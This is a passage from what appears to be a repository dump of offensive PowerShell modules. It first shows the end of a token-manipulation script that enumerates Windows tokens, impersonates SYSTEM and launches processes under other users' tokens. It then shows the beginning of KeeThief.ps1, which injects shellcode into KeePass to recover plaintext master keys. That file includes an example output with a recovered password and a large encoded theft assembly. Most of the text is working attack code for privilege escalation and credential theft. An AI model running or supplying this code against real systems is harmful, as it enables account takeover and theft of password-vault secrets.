privileges\n                    $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesEnabled -Value @()\n                    $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesAvailable -Value @()\n\n                    [UInt32]$TokenPrivilegesSize = 1000\n                    [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenPrivileges, $TokenPrivilegesPtr, $TokenPrivilegesSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n                        \n                        #Loop through each privilege\n                        [IntPtr]$PrivilegesBasePtr = [IntPtr](Add-SignedIntAsUnsigned $TokenPrivilegesPtr ([System.Runtime.InteropServices.Marshal]::OffsetOf([Type]$TOKEN_PRIVILEGES, \"Privileges\")))\n                        $LuidAndAttributeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n                        for ($i = 0; $i -lt $TokenPrivileges.PrivilegeCount; $i++)\n                        {\n                            $LuidAndAttributePtr = [IntPtr](Add-SignedIntAsUnsigned $PrivilegesBasePtr ($LuidAndAttributeSize * $i))\n\n                            $LuidAndAttribute = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributePtr, [Type]$LUID_AND_ATTRIBUTES)\n\n                            #Lookup privilege name\n                            [UInt32]$PrivilegeNameSize = 60\n                            $PrivilegeNamePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PrivilegeNameSize)\n                            $PLuid = $LuidAndAttributePtr #The Luid structure is the first object in the LuidAndAttributes structure, so a ptr to LuidAndAttributes also points to Luid\n\n                            $Success = $LookupPrivilegeNameW.Invoke([IntPtr]::Zero, $PLuid, $PrivilegeNamePtr, [Ref]$PrivilegeNameSize)\n                            if (-not $Success)\n                            {\n                                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                                Write-Warning \"Call to LookupPrivilegeNameW failed. Error code: $ErrorCode. RealSize: $PrivilegeNameSize\"\n                            }\n                            $PrivilegeName = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($PrivilegeNamePtr)\n\n                            #Get the privilege attributes\n                            $PrivilegeStatus = \"\"\n                            $Enabled = $false\n\n                            if ($LuidAndAttribute.Attributes -eq 0)\n                            {\n                                $Enabled = $false\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) -eq $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) #enabled by default\n                            {\n                                $Enabled = $true\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED) -eq $Win32Constants.SE_PRIVILEGE_ENABLED) #enabled\n                            {\n                                $Enabled = $true\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_REMOVED) -eq $Win32Constants.SE_PRIVILEGE_REMOVED) #SE_PRIVILEGE_REMOVED. This should never exist. Write a warning if it is found so I can investigate why/how it was found.\n                            {\n                                Write-Warning \"Unexpected behavior: Found a token with SE_PRIVILEGE_REMOVED. Please report this as a bug. \"\n                            }\n\n                            if ($Enabled)\n                            {\n                                $ReturnObj.PrivilegesEnabled += ,$PrivilegeName\n                            }\n                            else\n                            {\n                                $ReturnObj.PrivilegesAvailable += ,$PrivilegeName\n                            }\n\n                            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($PrivilegeNamePtr)\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\n                }\n                else\n                {\n                    Write-Verbose \"Call to LsaGetLogonSessionData succeeded. This SHOULD be SYSTEM since there is no data. $($LogonSessionData.UserName.Length)\"\n                }\n\n                #Free LogonSessionData\n                $ntstatus = $LsaFreeReturnBuffer.Invoke($LogonSessionDataPtr)\n                $LogonSessionDataPtr = [IntPtr]::Zero\n                if ($ntstatus -ne 0)\n                {\n                    Write-Warning \"Call to LsaFreeReturnBuffer failed. Error code: $ntstatus\"\n                }\n            }\n\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n            $LuidPtr = [IntPtr]::Zero\n        }\n\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenStatsPtr)\n        $TokenStatsPtr = [IntPtr]::Zero\n\n        return $ReturnObj\n    }\n\n\n    #Takes an array of TokenObjects built by the script and returns the unique ones\n    function Get-UniqueTokens\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [Object[]]\n            $AllTokens\n        )\n\n        $TokenByUser = @{}\n        $TokenByEnabledPriv = @{}\n        $TokenByAvailablePriv = @{}\n\n        #Filter tokens by user\n        foreach ($Token in $AllTokens)\n        {\n            $Key = $Token.Domain + \"\\\" + $Token.Username\n            if (-not $TokenByUser.ContainsKey($Key))\n            {\n                #Filter out network logons and junk Windows accounts. This filter eliminates accounts which won't have creds because\n                #    they are network logons (type 3) or logons for which the creds don't matter like LOCOAL SERVICE, DWM, etc..\n                if ($Token.LogonType -ne 3 -and\n                    $Token.Username -inotmatch \"^DWM-\\d+$\" -and\n                    $Token.Username -inotmatch \"^LOCAL\\sSERVICE$\")\n                {\n                    $TokenByUser.Add($Key, $Token)\n                }\n            }\n            else\n            {\n                #If Tokens have equal elevation levels, compare their privileges.\n                if($Token.IsElevated -eq $TokenByUser[$Key].IsElevated)\n                {\n                    if (($Token.PrivilegesEnabled.Count + $Token.PrivilegesAvailable.Count) -gt ($TokenByUser[$Key].PrivilegesEnabled.Count + $TokenByUser[$Key].PrivilegesAvailable.Count))\n                    {\n                        $TokenByUser[$Key] = $Token\n                    }\n                }\n                #If the new token is elevated and the current token isn't, use the new token\n                elseif (($Token.IsElevated -eq $true) -and ($TokenByUser[$Key].IsElevated -eq $false))\n                {\n                    $TokenByUser[$Key] = $Token\n                }\n            }\n        }\n\n        #Filter tokens by privilege\n        foreach ($Token in $AllTokens)\n        {\n            $Fullname = \"$($Token.Domain)\\$($Token.Username)\"\n\n            #Filter currently enabled privileges\n            foreach ($Privilege in $Token.PrivilegesEnabled)\n            {\n                if ($TokenByEnabledPriv.ContainsKey($Privilege))\n                {\n                    if($TokenByEnabledPriv[$Privilege] -notcontains $Fullname)\n                    {\n                        $TokenByEnabledPriv[$Privilege] += ,$Fullname\n                    }\n                }\n                else\n                {\n                    $TokenByEnabledPriv.Add($Privilege, @($Fullname))\n                }\n            }\n\n            #Filter currently available (but not enable) privileges\n            foreach ($Privilege in $Token.PrivilegesAvailable)\n            {\n                if ($TokenByAvailablePriv.ContainsKey($Privilege))\n                {\n                    if($TokenByAvailablePriv[$Privilege] -notcontains $Fullname)\n                    {\n                        $TokenByAvailablePriv[$Privilege] += ,$Fullname\n                    }\n                }\n                else\n                {\n                    $TokenByAvailablePriv.Add($Privilege, @($Fullname))\n                }\n            }\n        }\n\n        $ReturnDict = @{\n            TokenByUser = $TokenByUser\n            TokenByEnabledPriv = $TokenByEnabledPriv\n            TokenByAvailablePriv = $TokenByAvailablePriv\n        }\n\n        return (New-Object PSObject -Property $ReturnDict)\n    }\n\n\n    function Invoke-ImpersonateUser\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken\n        )\n\n        #Duplicate the token so it can be used to create a new process\n        [IntPtr]$NewHToken = [IntPtr]::Zero\n        $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) #todo does this need to be freed\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"DuplicateTokenEx failed. ErrorCode: $ErrorCode\"\n        }\n        else\n        {\n            $Success = $ImpersonateLoggedOnUser.Invoke($NewHToken)\n            if (-not $Success)\n            {\n                $Errorcode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to ImpersonateLoggedOnUser. Error code: $Errorcode\"\n            }\n        }\n\n        $Success = $CloseHandle.Invoke($NewHToken)\n        $NewHToken = [IntPtr]::Zero\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode\"\n        }\n\n        return $Success\n    }\n\n\n    function Create-ProcessWithToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken,\n\n            [Parameter(Position=1, Mandatory=$true)]\n            [String]\n            $ProcessName,\n\n            [Parameter(Position=2)]\n            [String]\n            $ProcessArgs,\n\n            [Parameter(Position=3)]\n            [Switch]\n            $PassThru\n        )\n        Write-Verbose \"Entering Create-ProcessWithToken\"\n        #Duplicate the token so it can be used to create a new process\n        [IntPtr]$NewHToken = [IntPtr]::Zero\n        $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken)\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"DuplicateTokenEx failed. ErrorCode: $ErrorCode\"\n        }\n        else\n        {\n            $StartupInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$STARTUPINFO)\n            [IntPtr]$StartupInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($StartupInfoSize)\n            $memset.Invoke($StartupInfoPtr, 0, $StartupInfoSize) | Out-Null\n            [System.Runtime.InteropServices.Marshal]::WriteInt32($StartupInfoPtr, $StartupInfoSize) #The first parameter (cb) is a DWORD which is the size of the struct\n\n            $ProcessInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$PROCESS_INFORMATION)\n            [IntPtr]$ProcessInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ProcessInfoSize)\n\n            $ProcessNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"$ProcessName\")\n            $ProcessArgsPtr = [IntPtr]::Zero\n            if (-not [String]::IsNullOrEmpty($ProcessArgs))\n            {\n                $ProcessArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"`\"$ProcessName`\" $ProcessArgs\")\n            }\n            \n            $FunctionName = \"\"\n            if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0)\n            {\n                #Cannot use CreateProcessWithTokenW when in Session0 because CreateProcessWithTokenW throws an ACCESS_DENIED error. I believe it is because\n                #this API attempts to modify the desktop ACL. I would just use this API all the time, but it requires that I enable SeAssignPrimaryTokenPrivilege\n                #which is not ideal. \n                Write-Verbose \"Running in Session 0. Enabling SeAssignPrimaryTokenPrivilege and calling CreateProcessAsUserW to create a process with alternate token.\"\n                Enable-Privilege -Privilege SeAssignPrimaryTokenPrivilege\n                $Success = $CreateProcessAsUserW.Invoke($NewHToken, $ProcessNamePtr, $ProcessArgsPtr, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr)\n                $FunctionName = \"CreateProcessAsUserW\"\n            }\n            else\n            {\n                Write-Verbose \"Not running in Session 0, calling CreateProcessWithTokenW to create a process with alternate token.\"\n                $Success = $CreateProcessWithTokenW.Invoke($NewHToken, 0x0, $ProcessNamePtr, $ProcessArgsPtr, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr)\n                $FunctionName = \"CreateProcessWithTokenW\"\n            }\n            if ($Success)\n            {\n                #Free the handles returned in the ProcessInfo structure\n                $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION)\n                $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null\n                $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null\n\n\t\t#Pass created System.Diagnostics.Process object to pipeline\n\t\tif ($PassThru) {\n\t\t\t#Retrieving created System.Diagnostics.Process object\n\t\t\t$returnProcess = Get-Process -Id $ProcessInfo.dwProcessId\n\n\t\t\t#Caching process handle so we don't lose it when the process exits\n\t\t\t$null = $returnProcess.Handle\n\n\t\t\t#Passing System.Diagnostics.Process object to pipeline\n\t\t\t$returnProcess\n\t\t}\n            }\n            else\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"$FunctionName failed. Error code: $ErrorCode\"\n            }\n\n            #Free StartupInfo memory and ProcessInfo memory\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($StartupInfoPtr)\n            $StartupInfoPtr = [Intptr]::Zero\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcessInfoPtr)\n            $ProcessInfoPtr = [IntPtr]::Zero\n            [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($ProcessNamePtr)\n            $ProcessNamePtr = [IntPtr]::Zero\n\n            #Close handle for the token duplicated with DuplicateTokenEx\n            $Success = $CloseHandle.Invoke($NewHToken)\n            $NewHToken = [IntPtr]::Zero\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode\"\n            }\n        }\n    }\n\n\n    function Free-AllTokens\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [PSObject[]]\n            $TokenInfoObjs\n        )\n\n        foreach ($Obj in $TokenInfoObjs)\n        {\n            $Success = $CloseHandle.Invoke($Obj.hToken)\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Verbose \"Failed to close token handle in Free-AllTokens. ErrorCode: $ErrorCode\"\n            }\n            $Obj.hToken = [IntPtr]::Zero\n        }\n    }\n\n\n    #Enumerate all tokens on the system. Returns an array of objects with the token and information about the token.\n    function Enum-AllTokens\n    {\n        $AllTokens = @()\n\n        #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token.\n        #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges.\n        #We need to enumrate all processes running as SYSTEM and find one that we can use.\n        [string]$LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value\n        \n        $SystemTokens = Get-WmiObject -Class Win32_Process | ForEach-Object {\n            $OwnerInfo = $_.GetOwner()\n\n            if ($OwnerInfo.Domain -and $OwnerInfo.User) {\n                $OwnerString = \"$($OwnerInfo.Domain)\\$($OwnerInfo.User)\".ToUpper()\n\n                if ($OwnerString -eq $LocalSystemNTAccount.ToUpper()) {\n                    $_\n                }\n            }\n        }\n\n        ForEach ($SystemToken in $SystemTokens)\n        {\n            $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.ProcessId -WarningAction SilentlyContinue -ErrorAction SilentlyContinue\n            if ($SystemTokenInfo) { break }\n        }\n        if ($SystemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))\n        {\n            Write-Warning \"Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens\"\n        }\n\n        if ($SystemTokenInfo -ne $null -and $SystemTokenInfo.hProcToken -ne [IntPtr]::Zero)\n        {\n            $CloseHandle.Invoke($SystemTokenInfo.hProcToken) | Out-Null\n            $SystemTokenInfo = $null\n        }\n\n        $ProcessIds = get-process | where {$_.name -inotmatch \"^csrss$\" -and $_.name -inotmatch \"^system$\" -and $_.id -ne 0}\n\n        #Get all tokens\n        foreach ($Process in $ProcessIds)\n        {\n            $PrimaryTokenInfo = (Get-PrimaryToken -ProcessId $Process.Id -FullPrivs)\n\n            #If a process is a protected process, it's primary token cannot be obtained. Don't try to enumerate it.\n            if ($PrimaryTokenInfo -ne $null)\n            {\n                [IntPtr]$hToken = [IntPtr]$PrimaryTokenInfo.hProcToken\n\n                if ($hToken -ne [IntPtr]::Zero)\n                {\n                    #Get the LUID corrosponding to the logon\n                    $ReturnObj = Get-TokenInformation -hToken $hToken\n                    if ($ReturnObj -ne $null)\n                    {\n                        $ReturnObj | Add-Member -MemberType NoteProperty -Name ProcessId -Value $Process.Id\n\n                        $AllTokens += $ReturnObj\n                    }\n                }\n                else\n                {\n                    Write-Warning \"Couldn't retrieve token for Process: $($Process.Name). ProcessId: $($Process.Id)\"\n                }\n\n                foreach ($Thread in $Process.Threads)\n                {\n                    $ThreadTokenInfo = Get-ThreadToken -ThreadId $Thread.Id\n                    [IntPtr]$hToken = ($ThreadTokenInfo.hThreadToken)\n\n                    if ($hToken -ne [IntPtr]::Zero)\n                    {\n                        $ReturnObj = Get-TokenInformation -hToken $hToken\n                        if ($ReturnObj -ne $null)\n                        {\n                            $ReturnObj | Add-Member -MemberType NoteProperty -Name ThreadId -Value $Thread.Id\n                    \n                            $AllTokens += $ReturnObj\n                        }\n                    }\n                }\n            }\n        }\n\n        return $AllTokens\n    }\n\n\n    function Invoke-RevertToSelf\n    {\n        Param(\n            [Parameter(Position=0)]\n            [Switch]\n            $ShowOutput\n        )\n\n        $Success = $RevertToSelf.Invoke()\n\n        if ($ShowOutput)\n        {\n            if ($Success)\n            {\n                Write-Output \"RevertToSelf was successful. Running as: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n            else\n            {\n                Write-Output \"RevertToSelf failed. Running as: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n        }\n    }\n\n\n    #Main function\n    function Main\n    {\n        if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\"))\n        {\n            Write-Error \"Script must be run as administrator\" -ErrorAction Stop\n        }\n\n        #If running in session 0, force NoUI\n        if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0)\n        {\n            Write-Verbose \"Running in Session 0, forcing NoUI (processes in Session 0 cannot have a UI)\"\n            $NoUI = $true\n        }\n\n        if ($PsCmdlet.ParameterSetName -ieq \"RevToSelf\")\n        {\n            Invoke-RevertToSelf -ShowOutput\n        }\n        elseif ($PsCmdlet.ParameterSetName -ieq \"CreateProcess\" -or $PsCmdlet.ParameterSetName -ieq \"ImpersonateUser\")\n        {\n            $AllTokens = Enum-AllTokens\n            \n            #Select the token to use\n            [IntPtr]$hToken = [IntPtr]::Zero\n            $UniqueTokens = (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser\n            if ($Username -ne $null -and $Username -ne '')\n            {\n                if ($UniqueTokens.ContainsKey($Username))\n                {\n                    $hToken = $UniqueTokens[$Username].hToken\n                    Write-Verbose \"Selecting token by username\"\n                }\n                else\n                {\n                    Write-Error \"A token belonging to the specified username was not found. Username: $($Username)\" -ErrorAction Stop\n                }\n            }\n            elseif ( $ProcessId -ne $null -and $ProcessId -ne 0)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $ProcessId)\n                    {\n                        $hToken = $Token.hToken\n                        Write-Verbose \"Selecting token by ProcessID\"\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to ProcessId $($ProcessId) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            elseif ($ThreadId -ne $null -and $ThreadId -ne 0)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ThreadId) -and $Token.ThreadId -eq $ThreadId)\n                    {\n                        $hToken = $Token.hToken\n                        Write-Verbose \"Selecting token by ThreadId\"\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to ThreadId $($ThreadId) could not be found. Either the thread doesn't exist or the thread is in a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            elseif ($Process -ne $null)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $Process.Id)\n                    {\n                        $hToken = $Token.hToken\n                        Write-Verbose \"Selecting token by Process object\"\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to Process $($Process.Name) ProcessId $($Process.Id) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            else\n            {\n                Write-Error \"Must supply a Username, ProcessId, ThreadId, or Process object\"  -ErrorAction Stop\n            }\n\n            #Use the token for the selected action\n            if ($PsCmdlet.ParameterSetName -ieq \"CreateProcess\")\n            {\n                if (-not $NoUI)\n                {\n                    Set-DesktopACLs\n                }\n\n                Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs -PassThru:$PassThru\n\n                Invoke-RevertToSelf\n            }\n            elseif ($ImpersonateUser)\n            {\n                Invoke-ImpersonateUser -hToken $hToken | Out-Null\n                Write-Output \"Running As: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n\n            Free-AllTokens -TokenInfoObjs $AllTokens\n        }\n        elseif ($PsCmdlet.ParameterSetName -ieq \"WhoAmI\")\n        {\n            Write-Output \"$([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n        }\n        else #Enumerate tokens\n        {\n            $AllTokens = Enum-AllTokens\n\n            if ($PsCmdlet.ParameterSetName -ieq \"ShowAll\")\n            {\n                Write-Output $AllTokens\n            }\n            else\n            {\n                Write-Output (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser.Values\n            }\n\n            Invoke-RevertToSelf\n\n            Free-AllTokens -TokenInfoObjs $AllTokens\n        }\n    }\n\n\n    #Start the main function\n    Main\n}\n"
  },
  {
    "path": "modules/KeeThief.ps1",
    "content": "#requires -version 2\n\nfunction Get-KeePassDatabaseKey {\n<#\n    .SYNOPSIS\n        \n        Retrieves database mastey key information for unlocked KeePass database.\n\n        Function: Get-KeePassDatabaseKey\n        Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\n        License: BSD 3-Clause\n        Required Dependencies: None\n        Optional Dependencies: None\n\n    .DESCRIPTION\n        \n        Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\n        Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\n        method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\n        all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\n        from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\n        If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\n        is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode\n        is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\n        returning the plaintext/unprotected key data.\n\n    .PARAMETER Process\n\n        Optional KeePass process object to pass in on the pipeline.\n\n    .EXAMPLE\n\n        PS C:\\> Get-KeePassDatabaseKey -Verbose\n        VERBOSE: Examining KeePass process 4184 for master keys\n\n\n        Database             : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx\n        KeyType              : KcpUserAccount\n        KeePassVersion       : 2.34.0.0\n        ProcessID            : 4184\n        ExecutablePath       : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe\n        EncryptedBlobAddress : 49045328\n        EncryptedBlob        : {113, 148, 127, 29...}\n        EncryptedBlobLen     : 64\n        PlaintextBlob        : {120, 181, 162, 116...}\n        Plaintext            : eLWidCSt...\n        KeyFilePath          : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\n\n        Database             : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx\n        KeyType              : KcpKeyFile\n        KeePassVersion       : 2.34.0.0\n        ProcessID            : 4184\n        ExecutablePath       : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe\n        EncryptedBlobAddress : 49037240\n        EncryptedBlob        : {137, 185, 6, 97...}\n        EncryptedBlobLen     : 32\n        PlaintextBlob        : {177, 5, 150, 205...}\n        Plaintext            : sQWWzdcT...\n        KeyFilePath          : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license\n\n        Database             : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx\n        KeyType              : KcpPassword\n        KeePassVersion       : 2.34.0.0\n        ProcessID            : 4184\n        ExecutablePath       : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe\n        EncryptedBlobAddress : 48920376\n        EncryptedBlob        : {228, 78, 75, 16...}\n        EncryptedBlobLen     : 16\n        PlaintextBlob        : {80, 97, 115, 115...}\n        Plaintext            : Password123!\n        KeyFilePath          :\n\n    .EXAMPLE\n\n        PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose\n        VERBOSE: Examining KeePass process 4184 for master keys\n\n\n        Database             : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx\n        KeyType              : KcpUserAccount\n        ....\n#>\n    [CmdletBinding()] \n    param (\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [System.Diagnostics.Process[]]\n        [ValidateNotNullOrEmpty()]\n        $Process\n    )\n    \n    BEGIN {\n        if(-not $PSBoundParameters['Process']) {\n            try {\n                $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'}\n            }\n            catch {\n                throw 'No KeePass 2.X instances open!'\n            }\n        }\n\n        # load file off of disk instead\n        # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName)\n\n        # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\"\n        $EncodedCompressedFile = 'tL0HfFzFET/+7tVrknUq72TJlmSDzOOMjTFgJLkDppgSMLaRTDEdrIAe3Nkk4ZAxNYQYE2roJKQTQhLSQ0mDVIoDCUkIBtJpISGFVOTffGd233unYpzf///zx7q3Ozu7Ozs7Ozvbj1jzAcMyDMOmv+3bDeOrhvxbYrz9v030V9/59Xrji5nHp301dfjj01aeta7SdW45PLN88jldp548NBSu7zrl9K7yhqGudUNdB77jmK5zwtNOn11Xl91VpXHUMsM4PGUZJ7166bE63RcN08il0obRlzOMtMD+3U/uLnKclBPq4DaFbsOIv8aHcgzHP8tYcrlhNPD/+Bt9+N+9lO7hhqT7cWe8QuaMPOIM5IwpO8ET/S9N+OkkgOg9JOGdvf70d6+n7/m9qlx9Md2JKCfNLlfKp5KbaUPZXfouyNXgLaH/s8unnx0SYl7RzGntPwZv/9F0gibTcIyur5nGVXeljRT595Nc/qd/TXMmGZ+mL8UvVLa1Gm62Qs5szq0QIdnhfxQM261YcL4JZxUAK6Ray/acRdEEEFIhsw0pt/omhxIR2b7lHCoAjwCmFVZNw82ne+dQiGeFxOVs2nKr/ySU7j6fgDPc7hH3eaKhkqGw7rphBGXCQ2zDVflkCe7PucorGSkiocMMiFHZUodZJZrt0lz5hnkAKb3lZqUOlAOoUI0LLFSYUSbYuZV6Al0gkaxw0tuEN3B4+xzPOJV5bxQUam4Ualggd7ZnGoU1GkEjuOn1NpHP8kL6ZHuJHUYxv61DEJoJNOuZbfXsG/EpsD1sIdhzfilN5WxAXlONfY42gJEsM1pRabppDbODw6qWhlkxzNYwO4Y5GubEMFfD3BjmaZinYE1zphvtKbRRkhcfBTWDIn3CVpYar9xN3DBRKDeYDHgb/cwg+DEMbxwDP5PhVLFuvtEsX0S+oJ2CapEuB3gKIFMB8et6lkG8yrdwZKpvN3MNsSVVvguIHYgfY2fMgJjoFgfm5znSxwhHhRT761To3PvdsBMwMyA+u31FoHrlT0UZMyk9UwX8KOcLxKBrFLHhNJaTUfKZ1nxMx7zNaFgmhmU1LBvDchqWi2F5DctH9dJppFOsT3dUL10T8L91Z/nfNg7/p7wt/zt2yP+OWv637YD/02P+B9OhVRg73GXcShhVB3WaZ3UxH+s1rD6GTdKwSTGsQcMaYlhBwwpRHXQYFtWBs+M62GOCOtj1/0sbmPG2dVDaYR2Uausg2Nk2ELxNG3BL8hfVg4Vy8rdb6kXgTXNMYx+DO7BCZR59N5GqsMu/QN4zwEo/11PgjD9C1ZIKesg5wyv25zx3y7q5L3Ndt89pNH6LzoXSMIP5hJF1w93QZSx6ksAbA1RD1/ZJnYZvhruDZupZ3ZzHAeBAtrcTeJzzyygeY21uQIYzUbw9Cd8NqQKz+Z5FUNhmMAtwC0I4m1x1PSRcRgaIWa8Y9KJWwjnQ8K9u45Bel8NZwVPsvRD0NVH+5oifiZT/NnC5yWZaCnY4V+c+0uYFS1H259xSah/0De82Oj9oIG1yn2wcfb/0E4Yx2bj3UaOFOpyUSe5vPStmTdOcgvEtg82zgt2X18U1OfGSZYaHoUIPZt6JZ8u6oA9ssjwG55lbdRZ//LR8Gq3g